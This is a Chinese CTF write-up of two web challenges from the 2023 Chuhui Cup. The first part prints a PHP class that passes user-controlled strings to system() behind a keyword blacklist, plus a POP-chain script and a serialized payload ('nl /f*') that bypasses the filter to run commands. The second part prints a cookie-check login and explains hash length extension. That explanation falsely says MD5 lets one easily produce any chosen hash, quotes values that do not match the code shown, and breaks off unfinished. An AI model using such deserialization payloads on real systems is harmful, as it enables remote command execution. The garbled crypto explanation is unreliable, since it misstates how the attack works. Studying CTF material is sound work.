2023楚慧杯 WEB方向 部分:(

发布时间:2023年12月19日

1、eaaeval

查看源码能看见账号:username169,密码:password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php

通过dirsearch目录爆破可以得到www.zip

<?php
class Flag{
    public $a;
    public $b;
    public function __construct(){
        $this->a = 'admin';
        $this->b = 'admin';
    }

    public function __destruct(){
        if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){
		system($this->a.' '.$this->b);
	    }else{
                echo "again?";
        }
    }
}
$wzbz = $_GET['wzbz'];
unserialize($wzbz);
?>

system($this->a.' '.$this->b);这里可以命令执行,使a=nl,b=/f*绕过正则

pop链:

<?php
class Flag{
    public $a;
    public $b;
    public function __construct(){
        $this->a = 'nl';
        $this->b = '/f*';
    }
}
$f=new Flag();
echo serialize($f);
?>

得到O:4:"Flag":2:{s:1:"a";s:2:"nl";s:1:"b";s:3:"/f*";}

payload:

wzbz=O:4:"Flag":2:{s:1:"a";s:2:"nl";s:1:"b";s:3:"/f*";}

2、upload_shell

 <?php
session_start();
highlight_file(__FILE__);
include "./my.php";
echo strlen($secret);
echo"<br>";
echo(md5($secret."adminpassword"));
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["source"])) {
    if ($username === "admin" && $password != "password") {
         if ($_COOKIE["source"] === md5($secret.$username.$password)) {

         // 在验证用户后,如果登录成功,设置会话变量来表示用户已登录
          $_SESSION['loggedin'] = true;
          $_SESSION['username'] = 'admin'; // 用户名
          $_SESSION['role'] = 'admin'; // 用户角色或权限
          echo "<script>window.location.href='upload.php';</script>";
        }
        else {
             echo "<br>"; 
            die ("你的cookie好像不太对啊");
        }
    }
    else {
        die ("可不会轻易放你进去");
    }
}
    
14
879bd10c8628894d388c068a25326c21

看别人的wp得知这里使用了哈希拓展攻击

我们注意到,md5($salt+“adminroot”)=e6ccbf12de9d33ec27a5bcfb6a3293df,对于未知salt的MD5或SHA-1哈希,哈希长度拓展攻击可以被用来构造一个新的有效哈希值,从而绕过原有的认证。这是因为,MD5和SHA-1算法的哈希函数存在一个特定的性质:给定一个消息M和其哈希值H,可以很容易地计算出一个新的消息M',使得M'的哈希值为任意指定的值H'。

哈希拓展攻击(Hash Length Extension Attack)是一种针对使用哈希函数进行消息认证的协议或应用的攻击方式。

哈希函数是将任意长度的输入数据映射为固定长度的输出,具有唯一性、不可逆性和抗碰撞等特性。在正常情况下,应用程序或协议会对消息进行哈希运算,并将哈希值与消息一起传输或存储,以实现消息的完整性验证。然而,在一些哈希函数中,如MD5和SHA-1等较旧的哈希算法,存在一个安全漏洞,即哈希拓展攻击。攻击者可以通过已知的哈希值和一些补充数据(称为扩展数据),使用特定的方法生成新的哈希值,而无需知道原始数据的内容。

具体来说,攻击者可以利用已知的哈希值H,通过在原始消息M的末尾添加扩展数据E,并对新的消息(M||E)进行哈希运算,得到新的哈希值H'。这个新的哈希值H'可以被认为是对新消息(M||E)的完整性验证,而不需要知道原始消息M的内容。哈希拓展攻击可能导致认证绕过、身份伪造、篡改数据等安全问题。
?

文章来源:https://blog.csdn.net/2301_76690905/article/details/135045142
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。